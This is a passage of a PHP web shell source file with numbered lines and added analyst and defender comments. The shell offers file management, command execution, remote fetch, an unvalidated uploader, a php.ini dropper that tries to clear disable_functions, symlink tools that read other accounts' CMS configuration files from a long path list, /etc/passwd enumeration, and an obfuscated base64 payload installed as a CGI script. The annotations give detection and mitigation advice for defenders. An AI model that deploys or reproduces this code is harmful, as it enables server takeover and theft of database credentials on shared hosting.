        // Defender note: the query parameters used here (path, deldir, delfile, rendir, renfile,
        // old, editfile, unzipfile) and the POST fields delbox[], mass_action, chmod_value and
        // mass_files, all sent to a single script, are useful patterns for access-log and WAF hunting.
  1142. echo "<table border='1' width='100%' frame='void'>
  1143. <tr>
  1144. <th>
  1145. Current Directory: ";
  1146. $ex = explode("/", $dir);
  1147. for ($p = 0;$p < count($ex);$p++) {
            // @ hides the notice from appending to $linkpath before it is first assigned.
  1148.     @$linkpath.= $ex[$p] . '/';
  1149.     $linkpath2 = rtrim($linkpath, "/");
  1150.     echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
  1151. }
  1152. echo "</th>
  1153. </tr>
  1154. </table>
  1155. <div id='hover'>
  1156. <table border='1' width='100%'>
  1157. <form action='' method='post' id='checkboxall'>
  1158. <tr>
  1159. <th>Directory/File Name</th>
  1160. <th>Owner/Group</th>
  1161. <th>Permissions</th>
  1162. <th>Writeable</th>
  1163. <th>Size</th>
  1164. <th>Last Modified</th>
  1165. <th>Delete</th>
  1166. <th>Rename</th>
  1167. <th>Mass</th>
  1168. </tr>
  1169. ";
  1170. foreach ($direcs as $d) {
            // Resolve numeric owner/group ids to names when the posix extension is available.
  1171.     $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
  1172.     $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
  1173.     if (is_array($downer)) {
  1174.         $downer = $downer['name'];
  1175.     }
  1176.     if (is_array($dgroup)) {
  1177.         $dgroup = $dgroup['name'];
  1178.     }
            // Mode rendered in octal with the first two characters of the string dropped.
  1179.     $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
  1180.     $dwrite = is_writeable("$dir/$d") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
  1181.     $dsize = "Directory";
  1182.     $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
  1183.     echo "<tr>
  1184. <td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
  1185. <td style='text-align: center;'>$downer/$dgroup</td>
  1186. <td style='text-align: center;'>$dperms</td>
  1187. <td style='text-align: center;'>$dwrite</td>
  1188. <td style='text-align: center;'>$dsize</td>
  1189. <td style='text-align: center;'>$dtime</td>
  1190. <td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
  1191. <td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
  1192. <td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
  1193. </tr>";
  1194. }
  1195. foreach ($files as $f) {
  1196.     $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
  1197.     $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
  1198.     if (is_array($fowner)) {
  1199.         $fowner = $fowner['name'];
  1200.     }
  1201.     if (is_array($fgroup)) {
  1202.         $fgroup = $fgroup['name'];
  1203.     }
  1204.     $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
  1205.     $fwrite = is_writeable("$dir/$f") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
            // ByteConversion() is defined elsewhere in this file.
  1206.     $fsize = ByteConversion(filesize("$dir/$f"));
  1207.     $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
            // The text after the last "." decides whether the name links to the unzip or the edit action.
  1208.     $zip_file = explode(".", $f);
  1209.     $zip_file2 = end($zip_file);
  1210.     echo "<tr>";
  1211.     if ($zip_file2 == "zip") {
  1212.         echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
  1213.     } else {
  1214.         echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
  1215.     }
  1216.     echo "<td style='text-align: center;'>$fowner/$fgroup</td>
  1217. <td style='text-align: center;'>$fperms</td>
  1218. <td style='text-align: center;'>$fwrite</td>
  1219. <td style='text-align: center;'>$fsize</td>
  1220. <td style='text-align: center;'>$ftime</td>
  1221. <td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
  1222. <td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
  1223. <td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
  1224. </tr>";
  1225. }
  1226. echo "</table></div>";
  1227. echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
  1228. <input type='button' onclick='checkall();' value='Select/Unselect All'>
  1229. <select name='mass_action'>
  1230. <option value='Delete'>Delete</option>
  1231. <option value='chmod'>chmod</option>
  1232. </select>
  1233. <input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
  1234. <input type='submit' name='mass_files'><br></div>";
  1235. echo "</form>";
  1236. closedir();
  1237. ?>
  1238. <script type="text/javascript">/*<![CDATA[*/function removeValue(){document.getElementById("ch").value=""}checked=false;function checkall(a){var c=document.getElementById("checkboxall");if(checked==false){checked=true}else{checked=false}for(var b=0;b<c.elements.length;b++){c.elements[b].checked=checked}};/*]]>*/</script>
  1239. <?php
  1240. $wr = is_writeable($dir) ? "<font color='#00ff00'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
        // Action panel: prints the forms for create directory, create file, change directory, edit
        // file, upload, remote fetch ("wget") and command execution. $wr is the writability badge
        // for $dir shown under the forms that write to it. The handlers for these forms are not
        // in this part of the file.
        // Defender note: the submit-field names (do_create_dir, do_create_file, do_go_dir,
        // do_go_edit, do_upload_file, do_wget_file, do_exe_command) appear in POST bodies and are
        // usable as request-inspection signatures; multipart uploads and command strings posted to
        // a script inside a content directory are worth alerting on by themselves.
  1241. echo "<table border='1' width='100%' frame='void'>
  1242. <tr>
  1243. <td>
  1244. <center>
  1245. Create directory:<br>
  1246. <form action='' method='post'>
  1247. <input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
  1248. <input type='submit' name='do_create_dir' value='Create'><br>
  1249. $wr
  1250. </form>
  1251. </center>
  1252. </td>
  1253. <td>
  1254. <center>
  1255. Create file:<br>
  1256. <form action='' method='post'>
  1257. <input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
  1258. <input type='submit' name='do_create_file' value='Create'><br>
  1259. $wr
  1260. </form>
  1261. </center>
  1262. </td>
  1263. </tr>
  1264. <tr>
  1265. <td>
  1266. <center>
  1267. Go to directory:<br>
  1268. <form action='' method='post'>
  1269. <input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
  1270. <input type='submit' name='do_go_dir' value='Go'><br>
  1271. </form>
  1272. </center>
  1273. </td>
  1274. <td>
  1275. <center>
  1276. Edit file:<br>
  1277. <form action='' method='post'>
  1278. <input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
  1279. <input type='submit' name='do_go_edit' value='Edit'><br>
  1280. </form>
  1281. </center>
  1282. </td>
  1283. </tr>
  1284. <tr>
  1285. <td>
  1286. <center>
  1287. <form action='' method='post' enctype='multipart/form-data'>
  1288. Upload to location:<br>
  1289. <input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
  1290. <input type='submit' value='Upload' name='do_upload_file'><br>
  1291. $wr
  1292. </form>
  1293. </center>
  1294. </td>
  1295. <td>
  1296. <center>
  1297. <form action='' method='post'>
  1298. wget file:<br>
  1299. <input type='text' name='wget_file' class='text' size='50' value='http://'>
  1300. <input type='submit' name='do_wget_file' value='wget'>
  1301. </form>
  1302. </center>
  1303. </td>
  1304. </tr>
  1305. <table border='1' frame='void' width='100%'>
  1306. <tr>
  1307. <td>
  1308. <center>
  1309. <form action='' method='post'>
  1310. Execute Command:<br>
  1311. <input type='text' class='text' name='exe_command' size='60'>
  1312. <input type='submit' name='do_exe_command' value='Execute'><br>
  1313. </form>
  1314. </center>
  1315. </td>
  1316. </tr>
  1317. </table>
  1318. <br><br><br>";
  1319. ?>
  1320. <?php
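  /**
   * Build a random string of $length characters for use as a salt.
   *
   * Characters are drawn from a-z, A-Z and 1-9 (the digit 0 is not in the set,
   * as in the original list). The original picked characters with array_rand(),
   * which PHP documents as unsuitable for cryptographic purposes; this version
   * uses random_int() where the runtime provides it and falls back to mt_rand()
   * on older runtimes so the function keeps working there. The fallback is not
   * cryptographically secure.
   *
   * @param int $length Number of characters to produce; values below 1 give "".
   * @return string The generated string.
   */
  function gen_salt($length) {
      $alphabet = 'aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ123456789';
      $last = strlen($alphabet) - 1;
      // Resolve the random source once instead of on every iteration.
      $secure = function_exists('random_int');
      $salt = '';
      for ($i = 0; $i < $length; $i++) {
          $index = $secure ? random_int(0, $last) : mt_rand(0, $last);
          $salt .= $alphabet[$index];
      }
      return $salt;
  }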
  1333. ?>
  1334. <h2><p>Symlink Killer ++</p></h2>
  1335. <form method=post><font color=white size=2 face="comic sans ms">Click this button to generate PHP.ini</font><p>
  1336. <input type=submit name=ini value="Generate PHP.ini" /></form>
  1337. <form method=post><font color=white size=2 face="comic sans ms">Click this button to extract usernames for Symlink</font><p>
  1338. <input type=submit name="usre" value="Extract usernames" /></form>
  1339. <?php
  1340.     if(isset($_POST['ini']))
            // On POST ini, creates (or truncates) a file named php.ini in the current working
            // directory, writes the single line held in $rr into it, and prints a link to that file.
            // Presumably aimed at hosts that read a per-directory php.ini - confirm against the SAPI in use.
            // Defender note: php.ini or .user.ini files appearing inside web-served directories are
            // an indicator worth alerting on; where PHP runs as CGI/FastCGI, pin the configuration
            // location so that files dropped beside scripts are not read as configuration.
  1341.     {
  1342.        
                // The fopen() result is not checked and the handle is never closed in this block.
  1343.         $r=fopen('php.ini','w');
  1344.         $rr=" disbale_functions=none ";
  1345.         fwrite($r,$rr);
  1346.         $link="<a href=php.ini><font color=red size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  1347.         echo $link;
  1348.        
  1349.         }
  1350.    
  1351.    
  1352.    
  1353.     ?>
  1354. <?php
  1355.     error_reporting(0);
            // error_reporting(0) above turns off PHP error reporting from this point in the request.
            //
            // Symlink-based cross-account read, run on POST su. Steps visible in this block:
            //  1. Creates ./security (mode 0777), writes an .htaccess into it and symlinks the
            //     filesystem root to security/root.
            //  2. Creates ./SECURITY (mode 0777) with the same .htaccess text. The mkdir() result
            //     is assigned to $dir, replacing whatever $dir held before.
            //  3. For every line of the posted "user" field and every relative path in
            //     $configuration, creates a symlink named "SECURITY/<user> .. <path>" that points
            //     at /home/<user>/public_html/<path>.
            // The .htaccess text asks Apache to enable all Options and to serve .php and .html as
            // text/plain, so a linked PHP configuration file would be returned as source text
            // instead of being executed.
            // Defender note: this depends on the web server following symlinks out of the account
            // and on other accounts' configuration files being readable by this user. Mitigations
            // on shared hosting: config files readable only by their owning account, per-account
            // process isolation, Apache Options -FollowSymLinks or SymLinksIfOwnerMatch with
            // AllowOverride preventing .htaccess from re-enabling Options (treat the owner-match
            // check as a hardening layer, not the sole control). Hunting: symlinks under web
            // roots whose targets lie outside the owning account, directories named security or
            // SECURITY, and .htaccess files mapping .php to text/plain.
  1356.     echo "<font color=red size=2 face=\"comic sans ms\">";
  1357.     if(isset($_POST['su']))
  1358.     {
  1359.     mkdir('security',0777);
  1360. $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1361. $g = fopen('security/.htaccess','w');
  1362. fwrite($g,$rr);
  1363. $security = symlink("/","security/root");
  1364.             $rt="<a href=security/root><font color=white size=3 face=\"comic sans ms\"> Success </font></a>";
  1365.         echo "Check link given below for / folder symlink <br><u>$rt</u>";
  1366.        
  1367.         $dir=mkdir('SECURITY',0777);
  1368.         $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1369.         $f = fopen('SECURITY/.htaccess','w');
  1370.    
  1371.         fwrite($f,$r);
  1372.         $consym="<a href=SECURITY/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  1373.         echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  1374.        
                    // One account name per line, as posted by the user-list form.
  1375.             $usr=explode("\n",$_POST['user']);
                // Relative paths of common CMS, forum, shop and billing configuration files.
  1376.         $configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.
php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
  1377.         foreach($usr as $uss )
  1378.         {
  1379.             $us=trim($uss);
  1380.                        
  1381.             foreach($configuration as $c)
  1382.             {
                     // symlink() return values are ignored, so links to missing targets are created silently.
  1383.              $rs="/home/".$us."/public_html/".$c;
  1384.              $r="SECURITY/".$us." .. ".$c;
  1385.              symlink($rs,$r);
  1386.            
  1387.         }
  1388.            
  1389.             }
  1390.        
  1391.        
  1392.         }
  1393.    
  1394.    
  1395.    
  1396.     ?>
  1397. <?php
        // Analyst annotation (code unchanged): handler for the POST field 'usre'.
        // It reads /etc/passwd with file() and echoes the text before the first ':'
        // of every line (the account-name field) into a textarea named 'user'.
        // NOTE(review): no access check is visible in this chunk. Whether the read
        // succeeds depends on the host; an open_basedir setting that excludes /etc
        // would deny it. The values are echoed without HTML escaping.
  1398.     if(isset($_POST['usre'])){
  1399.         ?><form method=post>
  1400. <textarea rows=10 cols=50 name=user><?php  $users=file("/etc/passwd");
  1401. foreach($users as $user)
  1402. {
  1403. $str=explode(":",$user);
  1404. echo $str[0]."\n";
  1405. }
  1406.  
  1407. ?>
  1408.     </textarea><br><br>
  1409. <input type=submit name=su value="Start Extract" /></form>
  1410. <?php } ?>
  1411. <form method=post>
  1412. <font color=white size=2 face="comic sans ms">Click this button to open manual symlink form</font><p>
  1413. <input type=submit name=man value="Open Manual symlink form"/></form>
  1414. <?php
  1415.     if(isset($_POST['man']))
  1416. {  
  1417. ?>
  1418. <form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">&nbsp file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="Lets do it "></form>
  1419. <?php  
  1420. }  
  1421.     ?>
  1422. <?php
        // Analyst annotation (code unchanged): handler for the POST field 'manual'.
        // 'dli' (link target) and 'fna' (link name) come from the request and are
        // only trimmed. The handler creates a SECURITY directory (mode 0777), writes
        // an .htaccess there containing "Options all", "Require None" and
        // "Satisfy Any", calls symlink($dlink, "SECURITY/".$fna) and echoes both
        // values back without HTML escaping. The fopen() handle is never closed.
        // error_reporting(0) hides any warnings these calls raise.
        // Detection: a web-writable SECURITY/ directory holding an .htaccess with
        // these directives, plus symlinks that point outside the document root.
        // Mitigation: list symlink in php.ini disable_functions, and in Apache use
        // SymLinksIfOwnerMatch with an AllowOverride that does not permit Options.
  1423.     error_reporting(0);
  1424.     if(isset($_POST['manual']))
  1425.     {
  1426.     $dlink=trim($_POST['dli']);
  1427.      $fna=trim($_POST['fna']);
  1428.      mkdir('SECURITY',0777);
  1429.     $acc = " Options all \n DirectoryIndex security.html  \n Require None \n Satisfy Any";
  1430. $ha = fopen('SECURITY/.htaccess','w');
  1431. fwrite($ha,$acc);
  1432. $final="SECURITY/".$fna;
  1433. symlink($dlink,$final);
  1434.      
  1435. echo "<br>File link for Symlink ".$dlink." link >>> <a href=".$final."><font color=red size=3>is here</font></a>";
  1436. }
  1437.     ?>
  1438. <form method=post>
  1439. <font color=white size=2 face="comic sans ms">Click this button for running Perl based symlink </font><p>
  1440. <input type=submit name=passx value="Eval"><p></form>
  1441. <?php
        // Analyst annotation (code unchanged): handler for the POST field 'passx'.
        // It reads /etc/passwd with file() and splits each line on "\n", so $str[0]
        // is the whole record without its newline; every full passwd line is
        // echoed into the textarea named 'usernames', without HTML escaping.
        // NOTE(review): the button that triggers this is labelled "Eval" and the
        // caption mentions Perl, but the visible handler only prints the file.
  1442. if(isset($_POST['passx']))
  1443. {
  1444.     ?>
  1445. <textarea style="background:black;color:white" rows=20 cols=50 name=usernames><?php  $users=file("/etc/passwd");
  1446. foreach($users as $user)
  1447. {
  1448. $str=explode("\n",$user);
  1449. echo $str[0]."\n";
  1450. }
  1451.  
  1452. ?></textarea>
  1453. <?php
  1454. }
  1455.  
  1456.  
  1457.  
  1458. ?>
  1459. <form method=post>
  1460. <font size=5 color=white> <input type=submit name=perl value="Configuration File Killer"> </font></form>
  1461. <p>
  1462. <?php
  1463. if(isset($_POST['perl']))
  1464. {
        // Analyst annotation (code unchanged): handler for the POST field 'perl'.
        // The long string assigned to $da below is base64 text that is passed through
        // gzinflate(base64_decode(...)); the result is written to perl/in.root and
        // made executable (0755). perl/.htaccess is written with ExecCGI and
        // "AddHandler cgi-script .root", so the dropped file is served as a CGI
        // script, and the page then loads it in an iframe.
        // NOTE(review): the decoded payload was not inspected for this annotation;
        // handle it as hostile and decode it only in an isolated analysis environment.
        // Detection: gzinflate(base64_decode( applied to a long literal, and .htaccess
        // files that map an unusual extension to cgi-script. Mitigation: an
        // AllowOverride that excludes Options and FileInfo stops a per-directory
        // .htaccess from enabling ExecCGI or adding handlers.
  1465.     error_reporting(0);
  1466.  
  1467. $da='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';
  1468. $decryp=gzinflate(base64_decode($da));
  1469. mkdir('perl', 0777);
  1470. $hope = fopen("perl/.htaccess", 'w');
  1471. $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
  1472. fwrite ( $hope, $hcon ) ;
  1473. $pelfile = fopen("perl/in.root" ,"w");
  1474. fwrite ($pelfile,$decryp);
  1475.     chmod("perl/in.root",0755);
  1476.    echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
  1477.    echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>Open Configuration File</u></a></font>";
  1478.  
  1479. }
  1480. ?>
  1481. <form method=post>
  1482. <font color=white size=2>Symlink bypasser ( Use this tools if Cant read /etc/named ) </font><p>
  1483. <input type=submit name="ms" value="Let's play with us  " /></form>
  1484. <?php
        // Analyst annotation (code unchanged): handler for the POST field 'ms'.
        // It runs the fixed command "ls /var/named" through shell_exec() (no request
        // data reaches the command line), creates a SymSec directory (mode 0777),
        // writes SymSec/.htaccess and creates the symlink SymSec/root pointing at "/".
        // The .htaccess sets text/plain for .php and .html and includes
        // "Require None" / "Satisfy Any" — presumably so linked sources are returned
        // as text instead of being executed; confirm against the server config.
        // The command output is echoed, unescaped, into a textarea named 'web'.
        // Detection: a symlink to "/" under a document root and a SymSec/ directory.
        // Mitigation: shell_exec and symlink in php.ini disable_functions; Apache
        // SymLinksIfOwnerMatch and an AllowOverride without Options or FileInfo.
  1485.     if(isset($_POST['ms']))
  1486.     {
  1487.         error_reporting(0);
  1488.         $cmd="ls /var/named";
  1489.         $r=shell_exec($cmd);
  1490.        
  1491.  
  1492.         mkdir('SymSec',0777);
  1493.  
  1494.  
  1495.  
  1496.  
  1497. $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1498. $f = fopen('SymSec/.htaccess','w');
  1499.  
  1500. $security = symlink("/","SymSec/root");
  1501.  
  1502. fwrite($f , $rr);
  1503.         ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="Start the game " />
  1504. </form>
  1505. <?php
  1506.        
  1507.         }
  1508.    
        // Handler for the POST field 'w': each line of POST 'web' has its last four
        // characters removed, the owner of /etc/valiases/<name> is resolved with
        // fileowner() + posix_getpwuid(), and a link to
        // SymSec/root/home/<owner>/public_html/ is printed. Request data and the
        // resolved names are echoed without HTML escaping.
        // NOTE(review): $_POST['web'] is read before the isset() check as well, so
        // the first explode() runs on every request; error_reporting(0) hides the
        // resulting notice.
  1509. error_reporting(0);
  1510. $webs=explode("\n",$_POST['web']);
  1511. if(isset($_POST['w']))
  1512. {
  1513. $webs=explode("\n",$_POST['web']);
  1514. echo "<table width=40% align=center border=1>
  1515. <tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
  1516. foreach($webs as $f)
  1517. {
  1518.     $str=substr_replace($f,"",-4);
  1519.    
  1520.  
  1521. $user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
  1522.  
  1523. echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=SymSec/root/home/".$user['name']."/public_html/>Open the Symlink file</a></tr></table>"; flush();
  1524.  
  1525.  
  1526.    
  1527.    
  1528.    
  1529.     }  
  1530.    
  1531.     }
  1532.  
  1533.  
  1534. ?>
  1535. <?php
        // Analyst annotation (code unchanged): upload form and handler. When POST
        // '_upl' equals "Upload", the uploaded temp file is copied to the
        // client-supplied file name, relative to the script's working directory.
        // The name and content are not validated and '@' suppresses copy() warnings.
        // NOTE(review): no access check is visible in this chunk.
        // Detection: new files owned by the web-server account appearing next to an
        // unexpected script, and multipart POSTs addressed to that script.
  1536. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1537. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1538. if( $_POST['_upl'] == "Upload" ) {
  1539. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success  ^_^ <b><br><br>'; }
  1540. else { echo '<b>Upload Failed :(  </b><br><br>'; }
  1541. }
  1542. ?>
  1543. <?php
        // Analyst annotation (code unchanged): the file-manager actions of the web
        // shell start here. success() and error() are called but not defined in this
        // chunk, and $domain, $script, $dir and $script2 are set elsewhere — their
        // behaviour is not confirmed from here. Every path below is taken from the
        // request as-is; no validation or access check is visible.
  1544. //Make directory stuff
        // POST 'do_create_dir': creates the directory named by POST 'create_dir'
        // with mode 0777 (PHP applies the process umask) unless it already exists.
  1545. if (isset($_POST['do_create_dir'])) {
  1546.     $cdir = $_POST['create_dir'];
  1547.     if (is_dir($cdir)) {
  1548.         success("dir_exists", $cdir);
  1549.     } else {
  1550.         if (mkdir($cdir, 0777)) {
  1551.             success("createdir", $cdir);
  1552.         } else {
  1553.             error("Directory was not created!");
  1554.         }
  1555.     }
  1556. }
  1557. //Make file stuff
        // POST 'do_create_file': opens the path in POST 'create_file' with "w+",
        // which creates an empty file; the handle is not closed in this block.
